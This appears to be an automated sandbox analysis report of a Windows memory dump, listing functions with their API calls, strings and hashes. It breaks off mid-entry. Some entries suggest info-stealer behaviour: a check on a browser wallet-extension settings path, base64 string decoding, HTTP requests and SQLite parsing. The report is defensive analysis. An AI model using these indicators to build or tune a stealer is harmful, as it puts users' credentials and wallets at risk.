Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c6907cd4de3e453768d3bcc2f7d0c4fd10da72fffc908c6f02f3a07c64c4c03e
Instruction ID: 059437bc8a41031ed9d61808184c1310e00730ced1c43a42cccf6b600875dc7a
Opcode Fuzzy Hash: c6907cd4de3e453768d3bcc2f7d0c4fd10da72fffc908c6f02f3a07c64c4c03e
Instruction Fuzzy Hash: 3FF0FF715102198BDB30DFA8DC45BDDB7F8BB04309F10852ED459E7241DFB866488BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00464555, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 520a541090977386c38b358fa909f159a82519fb23c59b01b47a66ede2f65412
Instruction ID: bcd982347e5388f5f6cf48e1354f5e374aaa2308a4f9e54cfd126d45015da817
Opcode Fuzzy Hash: 520a541090977386c38b358fa909f159a82519fb23c59b01b47a66ede2f65412
Instruction Fuzzy Hash: 22F03AB0505200BFDF08CF14C644A363BA6ABD5308F34849EE2064E202E736D843DB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD8C, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00404C99: __EH_prolog3.LIBCMT ref: 00404CA0

CreateDirectoryA.KERNEL32(?,00000000), ref: 0040CDBE

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectoryH_prolog3
String ID:
API String ID: 517817506-0
Opcode ID: f548e273158eca03b5a7778d9aeb1e25a7e8851f9d60b96940b9276537ab3f53
Instruction ID: 4df2910af8312be61e3f43843f9077bd8910c3830de8634208a0d3521147f49e
Opcode Fuzzy Hash: f548e273158eca03b5a7778d9aeb1e25a7e8851f9d60b96940b9276537ab3f53
Instruction Fuzzy Hash: BBF01270910208EBEF04DFE5DD46FDD7778EB18704F40043AE501B71D1E6B8A9048B69

Uniqueness

Uniqueness Score: -1.00%

Function 0046E866, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__flsbuf.LIBCMT ref: 0046E887

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __flsbuf
String ID:
API String ID: 2056685748-0
Opcode ID: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
Instruction ID: 04766f330c7d4fb9599b8ce81bb9ddcfb2d387c2a4500ac8c3ccf6a697c258ef
Opcode Fuzzy Hash: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
Instruction Fuzzy Hash: B2E0DF744001008ECB281B26C4452327BE0EF01769F3886CFDA808B1E3E33E8443EB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00403570, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 004035A6

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 660509fda3c089903a01d58005a256b5f3c6fddca4c5480059c3fac021dc877d
Instruction ID: 7c4f97ebe30a0e40352ab895cc7624637cca130e60e00242950d131df698fd88
Opcode Fuzzy Hash: 660509fda3c089903a01d58005a256b5f3c6fddca4c5480059c3fac021dc877d
Instruction Fuzzy Hash: 57E052B0E0420D9BCB44DFA8D5456DEBAF4BF08304F00856EE409F7340E77496458B99

Uniqueness

Uniqueness Score: -1.00%

Function 004323AD, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0049E224,00000001,0043EC1C,?,00000000,00000104), ref: 004323BD

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: da1c9d006e9c081273fb249626f3c7d2407ebdfce130c93631ec1466ca227e12
Instruction ID: aeef8d2b3daf6a536eec646ab281b3fc14bcb64341fe4a88342e86dab6776c02
Opcode Fuzzy Hash: da1c9d006e9c081273fb249626f3c7d2407ebdfce130c93631ec1466ca227e12
Instruction Fuzzy Hash: 64D0A77278020026FA147269BD07F661486C7C4F00F208C37B100951C9E6D95441C19E

Uniqueness

Uniqueness Score: -1.00%

Function 0041E194, Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041E1B1

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: cb823118e3f37e45c56de36a165aef6196477bfbdc35ace4ffb649adea5dbb97
Instruction ID: 2e2102e6d6d31b4ac8ab59c5f4979c509e8b141e586ac1e3b2825a56b5a0c551
Opcode Fuzzy Hash: cb823118e3f37e45c56de36a165aef6196477bfbdc35ace4ffb649adea5dbb97
Instruction Fuzzy Hash: 8CD0A73B90D7207AC5112541BC01B8B7B518F80774F14441AFA0455151D635485043CE

Uniqueness

Uniqueness Score: -1.00%

Function 004602E7, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,0040FCF1,?,0000001A,?,?,?,?,0049B0CC,00000000), ref: 00460301

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 8abd0d4a1aaaa8ce3704efc2628216932a0bc47a49807621a46e2fe4f5f1af93
Instruction ID: a1cfc258ace85268705f1e073b6c37177d7097cd07717b35597a93cc5ec55387
Opcode Fuzzy Hash: 8abd0d4a1aaaa8ce3704efc2628216932a0bc47a49807621a46e2fe4f5f1af93
Instruction Fuzzy Hash: 35D0C975205201BEA2845B75DC06E7BBBADEBC8610F11C82DB585C21A0DA30E8508B32

Uniqueness

Uniqueness Score: -1.00%

Function 0045E933, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0045E941

Part of subcall function 004621BC: __EH_prolog3_GS.LIBCMT ref: 004621C6

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3_InfoSystem
String ID:
API String ID: 2966166590-0
Opcode ID: 8b3fce1c67cd043143d20ce2bb38d19c90e506d80b50fb330ef638994a37111b
Instruction ID: 19387f219a3731ead70dc757997e5d2b7c80c02b5afc36ffe5bb65784f588ce8
Opcode Fuzzy Hash: 8b3fce1c67cd043143d20ce2bb38d19c90e506d80b50fb330ef638994a37111b
Instruction Fuzzy Hash: 9DD09E7180410EBBCF00EFE5D849EDDBB78AB19749F008019E601A6160E775D659CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0046007D, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,0040D0AC,00000000,?,00000000,00000000,00000001,00000000,00000001,00000000,00000000,?,?,00000010,00000001,00000000), ref: 00460081

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8515690202dd3f1e22270338427d5464750e4f46b865814bcb5fa175a2607fae
Instruction ID: a28a42821ee8407f29391703c1332d8ae434a88f6e19e1b5ffd39e3bc6eb5705
Opcode Fuzzy Hash: 8515690202dd3f1e22270338427d5464750e4f46b865814bcb5fa175a2607fae
Instruction Fuzzy Hash: FAC08C32025040895A0006386D0822B6A429B91727F506E32E2A6C00E0FB288812620A

Uniqueness

Uniqueness Score: -1.00%

Function 0046009A, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00405B9D,00000000,?,?,?,?,\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT,00000042,?,?,?,?,?,?,00000018), ref: 0046009E

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: aa2c18b0a177d23ae1fe41068b7e441dcbd1d5b1c86a858b99ecbdc31d8dbd05
Instruction ID: 1843a84c1d069ec1dfa23bc67e8ab56e4033e777740a678c8a50fd081140884d
Opcode Fuzzy Hash: aa2c18b0a177d23ae1fe41068b7e441dcbd1d5b1c86a858b99ecbdc31d8dbd05
Instruction Fuzzy Hash: 6DC08C300152006D56011634BC0862B25909B52326F108E32E0A6C02E1FB368C92A10B

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC81, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,0040FD2B,?,?,?,?,?,0049B0CC,00000000), ref: 0040FC85

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e4b5d0219a920b81702b9cb40a785678cf315e8f7c6d42b05232d98bc6d69701
Instruction ID: 2826b96ae538d60d6299356c6ab427591acdbf3dbfd1728cf757918122b7f824
Opcode Fuzzy Hash: e4b5d0219a920b81702b9cb40a785678cf315e8f7c6d42b05232d98bc6d69701
Instruction Fuzzy Hash: 4EC04C7052A55459EA201E349D0A01B2691AA83627F940E75E8A9D19E4D7348D5A7504

Uniqueness

Uniqueness Score: -1.00%

Function 00468526, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00468533

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction ID: 466fd781385ece6d26b5ad95310f91e1450fb2d06d7fe000b64fecd3ef7189a8
Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction Fuzzy Hash: 83C09B7254010C77CF111943DC02E553F1997C1764F044015FB1C19161BD77D561D599

Uniqueness

Uniqueness Score: -1.00%

Function 004695EE, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 004695FB

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: c73aeb522fd294d6785c845a98384fa68a79a6f6b3180c4d0583a3fa226b76ee
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: F2C09B7344010C77CF111D43EC02E453F1D97D0764F448011FB1D19161F577D96196C9

Uniqueness

Uniqueness Score: -1.00%

Function 00401016, Relevance: 1.3, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00401025

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: a16e5b16714a1448422f66c129117e691444f1ff8e53e8e7b1cf012d2f1c0baa
Instruction ID: 5549ee678ecdc109923b726f2ef86f730a44a939511cc6300ebf448b160a6775
Opcode Fuzzy Hash: a16e5b16714a1448422f66c129117e691444f1ff8e53e8e7b1cf012d2f1c0baa
Instruction Fuzzy Hash: BB01A736304286ABCB01CF6DD8C49A6BFD9EF5A304B048065FD84CB312D571D908C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0045FFED, Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,004115DE,?,?), ref: 00460005

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: b71ae343ab975d2989b4f4db368fa8c50d4811b8bdc7eb78032efafd36867071
Instruction ID: 4bd8ac2cc3887550dd3d539f9eb65bd25c9e707104c173d2c474ab704532a428
Opcode Fuzzy Hash: b71ae343ab975d2989b4f4db368fa8c50d4811b8bdc7eb78032efafd36867071
Instruction Fuzzy Hash: F6E09B356056514B83224E1CA80472BF7979FD5F11F19855FDD9497318E635CC014796

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040E9D0, Relevance: 7.6, APIs: 5, Instructions: 98stringencryptionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040EA10
CryptStringToBinaryA.CRYPT32(?,?,00000001,?,?,00000000,00000000), ref: 0040EA34
_memmove.LIBCMT ref: 0040EA8E
lstrcatA.KERNEL32(004866C4,004866C4), ref: 0040EAA4
lstrcatA.KERNEL32(004866C4,004866C4), ref: 0040EAB6

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$BinaryCryptString_memmove_memset
String ID:
API String ID: 3096129145-0
Opcode ID: be5abfd844e63ed34ba43aa0a8558c58b669c02ea89472c135ac5c946b25db83
Instruction ID: 26b0baabfd7ed76ddab585b5af8e3c419a642a735d219d93e9c0511fef25c445
Opcode Fuzzy Hash: be5abfd844e63ed34ba43aa0a8558c58b669c02ea89472c135ac5c946b25db83
Instruction Fuzzy Hash: 0C312D71900219AFDB10DFA6DC889EEBBB9FF19304B04047AE909E7241EB345919CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB68, Relevance: 6.0, APIs: 4, Instructions: 48encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040EB88
LocalAlloc.KERNEL32(00000040,?), ref: 0040EB96
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040EBAC
LocalFree.KERNEL32(?), ref: 0040EBBB

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: ba2fd9fc75d61570d03fead47c776ccc8f2477d1c7571f4d301cb85602a3b09f
Instruction ID: 286e464d283cc7e6db70dcb5cd6fabf2829f37cb30117995f1f6ba1dc61d63ad
Opcode Fuzzy Hash: ba2fd9fc75d61570d03fead47c776ccc8f2477d1c7571f4d301cb85602a3b09f
Instruction Fuzzy Hash: DA012870101224BBDB219F57DC8CE8B7FB8EF4ABA0B104466F909A6250D2709A50DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E962, Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040E983
GetVersionExA.KERNEL32(?), ref: 0040E99C

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Version_memset
String ID:
API String ID: 963298953-0
Opcode ID: 630a03cfa351ca82e0eb45fb75b4b476b08a7a55b897fe50bcbface550743a92
Instruction ID: a5026e6e28ae449b84c2821484506ba216ab75e514caff06066bd32c3568e6aa
Opcode Fuzzy Hash: 630a03cfa351ca82e0eb45fb75b4b476b08a7a55b897fe50bcbface550743a92
Instruction Fuzzy Hash: B9F0B431A642199FDB14DFB4EC42FAD73B49B05704F1005BD910EE72C2EA34964C8F05

Uniqueness

Uniqueness Score: -1.00%

Function 00470464, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0046B69A), ref: 0047046C
__mtterm.LIBCMT ref: 00470478

Part of subcall function 00470143: DecodePointer.KERNEL32(00000007,004705DA,?,0046B69A), ref: 00470154
Part of subcall function 00470143: TlsFree.KERNEL32(0000001D,004705DA,?,0046B69A), ref: 0047016E
Part of subcall function 00470143: DeleteCriticalSection.KERNEL32(00000000,00000000,77A1F3A0,?,004705DA,?,0046B69A), ref: 004728F6
Part of subcall function 00470143: _free.LIBCMT ref: 004728F9
Part of subcall function 00470143: DeleteCriticalSection.KERNEL32(0000001D,77A1F3A0,?,004705DA,?,0046B69A), ref: 00472920

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0047048E
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0047049B
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004704A8
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004704B5
TlsAlloc.KERNEL32(?,0046B69A), ref: 00470505
TlsSetValue.KERNEL32(00000000,?,0046B69A), ref: 00470520
__init_pointers.LIBCMT ref: 0047052A
EncodePointer.KERNEL32(?,0046B69A), ref: 0047053B
EncodePointer.KERNEL32(?,0046B69A), ref: 00470548
EncodePointer.KERNEL32(?,0046B69A), ref: 00470555
EncodePointer.KERNEL32(?,0046B69A), ref: 00470562
DecodePointer.KERNEL32(Function_000702C7,?,0046B69A), ref: 00470583
__calloc_crt.LIBCMT ref: 00470598
DecodePointer.KERNEL32(00000000,?,0046B69A), ref: 004705B2
GetCurrentThreadId.KERNEL32 ref: 004705C4

Strings

FlsGetValue, xrefs: 00470490
FlsFree, xrefs: 004704AA
FlsSetValue, xrefs: 0047049D
KERNEL32.DLL, xrefs: 00470467
FlsAlloc, xrefs: 00470488

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: bf80e413a73e2ed9339da5ddd42c98960932bea181f134a1a57730707299c739
Instruction ID: a6514c9f43803496a8cc65028fa9ea3a733dbab8ef7a352968fba5221639d0b5
Opcode Fuzzy Hash: bf80e413a73e2ed9339da5ddd42c98960932bea181f134a1a57730707299c739
Instruction Fuzzy Hash: 49316D31941212EADB21EF76ED4C6DA3EA4EB647607144A3FF418922B0FB798540CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00428C6B, Relevance: 33.7, APIs: 7, Strings: 12, Instructions: 497COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00428D46
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00428D80
_strncmp.LIBCMT ref: 0042900B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004290AA
__allrem.LIBCMT ref: 004290B5
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00429124

Part of subcall function 00428B20: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00428BC4
Part of subcall function 00428B20: __localtime64_s.LIBCMT ref: 00428BE7

Strings

year, xrefs: 00428F45, 00429201
localtime, xrefs: 00428FBB
second, xrefs: 00428EAD
hour, xrefs: 00428E6A
day, xrefs: 00428E42, 00429227
weekday , xrefs: 00429005
start of , xrefs: 004291B5
utc, xrefs: 0042914B
minute, xrefs: 00428E91
month, xrefs: 00428ECE, 004291DD
-, xrefs: 00428D98
unixepoch, xrefs: 004290F9

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem__localtime64_s_memset_strncmp
String ID: -$day$hour$localtime$minute$month$second$start of $unixepoch$utc$weekday $year
API String ID: 3149664924-3507268942
Opcode ID: fc68769db0c7042eef4e25d12973c8960b6577520ea3064413d6bb197fd7adc2
Instruction ID: d273cd2a9407dcd4b77d844465f12a27522f4c234fbaceace84397881f1682ef
Opcode Fuzzy Hash: fc68769db0c7042eef4e25d12973c8960b6577520ea3064413d6bb197fd7adc2
Instruction Fuzzy Hash: DB023772E01228DBDF109F65E8407EDBBB5AF54324F65449FE804BB282DB788C45876D

Uniqueness

Uniqueness Score: -1.00%

Function 004440D1, Relevance: 28.5, APIs: 2, Strings: 14, Instructions: 473COMMON

Download Yara Rule

Strings

Rowid %lld out of order (max larger than parent min of %lld), xrefs: 004443BB
btreeInitPage() returns error code %d, xrefs: 00444168
Fragmentation of %d bytes reported as %d on page %d, xrefs: 004445EE
Rowid %lld out of order (max larger than parent max of %lld), xrefs: 0044440C
Rowid %lld out of order (min less than parent min of %lld), xrefs: 004443DE
Rowid %lld out of order (previous was %lld), xrefs: 0044420F
Multiple uses for byte %d of page %d, xrefs: 004445CF
Corruption detected in cell %d on page %d, xrefs: 00444535
unable to get the page. error code=%d, xrefs: 0044413F
On tree page %d cell %d: , xrefs: 004441A9
Page %d: , xrefs: 00444129, 0044436A
On page %d at right child: , xrefs: 00444330
Child page depth differs, xrefs: 004442EC
Rowid %lld out of order (min less than parent max of %lld), xrefs: 00444449

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: Child page depth differs$Corruption detected in cell %d on page %d$Fragmentation of %d bytes reported as %d on page %d$Multiple uses for byte %d of page %d$On page %d at right child: $On tree page %d cell %d: $Page %d: $Rowid %lld out of order (max larger than parent max of %lld)$Rowid %lld out of order (max larger than parent min of %lld)$Rowid %lld out of order (min less than parent max of %lld)$Rowid %lld out of order (min less than parent min of %lld)$Rowid %lld out of order (previous was %lld)$btreeInitPage() returns error code %d$unable to get the page. error code=%d
API String ID: 0-2326541033
Opcode ID: 595790d936ca82a89320054d5f74cdfb5b2d646166774f9c90e660a9b08fb264
Instruction ID: faa56be6321582b24f794048a7152db149625d79fc18a7529399796fe82704c1
Opcode Fuzzy Hash: 595790d936ca82a89320054d5f74cdfb5b2d646166774f9c90e660a9b08fb264
Instruction Fuzzy Hash: D7126B71900129AFEF14DFA9C881BAEBBB1FF44314F14816AF855AB241D7789E50CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E083, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143networkCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040E08A
__cftof.LIBCMT ref: 0040E113
InternetOpenA.WININET(?,00000000,?,00000000,00000000), ref: 0040E12E
InternetSetOptionA.WININET(00000000,00000041,00000004), ref: 0040E151
InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 0040E172
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00400000,00000001), ref: 0040E19C
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E1B5
InternetCloseHandle.WININET(00000000), ref: 0040E1CB

Part of subcall function 00402EA9: std::_Xinvalid_argument.LIBCPMT ref: 00402EBC
Part of subcall function 00402EA9: _memmove.LIBCMT ref: 00402EF7

InternetCloseHandle.WININET(?), ref: 0040E1D4
InternetCloseHandle.WININET(?), ref: 0040E1DD

Strings

/, xrefs: 0040E0D7
http://, xrefs: 0040E0AD
GET, xrefs: 0040E196

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSendXinvalid_argument__cftof_memmovestd::_
String ID: /$GET$http://
API String ID: 2363951992-2325301807
Opcode ID: cece20078e738623206af8c20ab103f171099a69b905ad46f83a6c7eb2a98108
Instruction ID: 2c2113c5417e3d0e7c384b688603722c4f18f4d71f7c428fa70701178f72a7ca
Opcode Fuzzy Hash: cece20078e738623206af8c20ab103f171099a69b905ad46f83a6c7eb2a98108
Instruction Fuzzy Hash: 184119B1900208AEEB11EBE6CC85EEEBB7CEB14704F10443EF512B61D1DBB959458B69

Uniqueness

Uniqueness Score: -1.00%

Function 004042FC, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 277COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040434D
_memmove.LIBCMT ref: 0040439B
_memmove.LIBCMT ref: 004043C5
_memmove.LIBCMT ref: 004043FB
_memmove.LIBCMT ref: 00404457
_memmove.LIBCMT ref: 004044B1
_memmove.LIBCMT ref: 004044FE
_memmove.LIBCMT ref: 0040452C
_memmove.LIBCMT ref: 0040455F
std::_Xinvalid_argument.LIBCPMT ref: 0040458B

Strings

string too long, xrefs: 00404348
invalid string position, xrefs: 00404586

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: e1dcb338f6ff882e4ebbf147682959a3a90d1cafc345398e3fd207376342e08e
Instruction ID: 4bd97c7bb5cd782722ec7cea22b93ec19d06687b45f0035df8191a130f6a9bc8
Opcode Fuzzy Hash: e1dcb338f6ff882e4ebbf147682959a3a90d1cafc345398e3fd207376342e08e
Instruction Fuzzy Hash: 0C913EB03001059BCF24DF18DD91A6EB7A6EFC1708724493EFA42AB681D778E855CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0042E9DC, Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 269COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0042EAC4
__fprintf_l.LIBCMT ref: 0042EBF5
_memmove.LIBCMT ref: 0042EC9F

Strings

%s.%s, xrefs: 0042EA65
no entry point [%s] in shared library [%s], xrefs: 0042EBEE
not authorized, xrefs: 0042EA19
unable to open shared library [%s], xrefs: 0042EABD
lib, xrefs: 0042EB58
sqlite3_extension_init, xrefs: 0042EA3B
error during initialization: %s, xrefs: 0042EC48
_init, xrefs: 0042EBAB
sqlite3_, xrefs: 0042EB33

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l$_memmove
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%s]
API String ID: 3461008893-4148685299
Opcode ID: 40c66fe5060782ab32122c4b1b2bab727f803f1be732ea730856a7be84874fa7
Instruction ID: 686d5b9f190d863a25cbb6758587c95e1d8d3715b8070b6b7ef7b9f75d0d896d
Opcode Fuzzy Hash: 40c66fe5060782ab32122c4b1b2bab727f803f1be732ea730856a7be84874fa7
Instruction Fuzzy Hash: DA91B371A00325AFDF21EFA6E841AAE7BB4FF44304F54446AF845AB241D7389940CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004406FD, Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 360COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00440A8E

Strings

no such %s mode: %s, xrefs: 00440A16
vfs, xrefs: 00440964
access, xrefs: 004409D7
localhost, xrefs: 004407BC
cache, xrefs: 0044098A
%s mode not allowed: %s, xrefs: 00440A5C
invalid uri authority: %.*s, xrefs: 004407CF
file:, xrefs: 0044073E
no such vfs: %s, xrefs: 00440AB7
mode, xrefs: 004409B7

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove
String ID: %s mode not allowed: %s$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
API String ID: 4104443479-2023962546
Opcode ID: 0991d6dc8eb649fb25ea203fac6ef4c599ccc545146c4cdf17e6c1cbd09b9ec9
Instruction ID: 6fbf85c83f6a683e4e5f8bbbedeacf4bcf715c84a3be88edf7155a454e20b68a
Opcode Fuzzy Hash: 0991d6dc8eb649fb25ea203fac6ef4c599ccc545146c4cdf17e6c1cbd09b9ec9
Instruction Fuzzy Hash: 19C10971D042199BFF24DF68C4807EEBBB1AF55314F24406BE944AB342D7389D928B99

Uniqueness

Uniqueness Score: -1.00%

Function 00404027, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404069
_memmove.LIBCMT ref: 004040B4
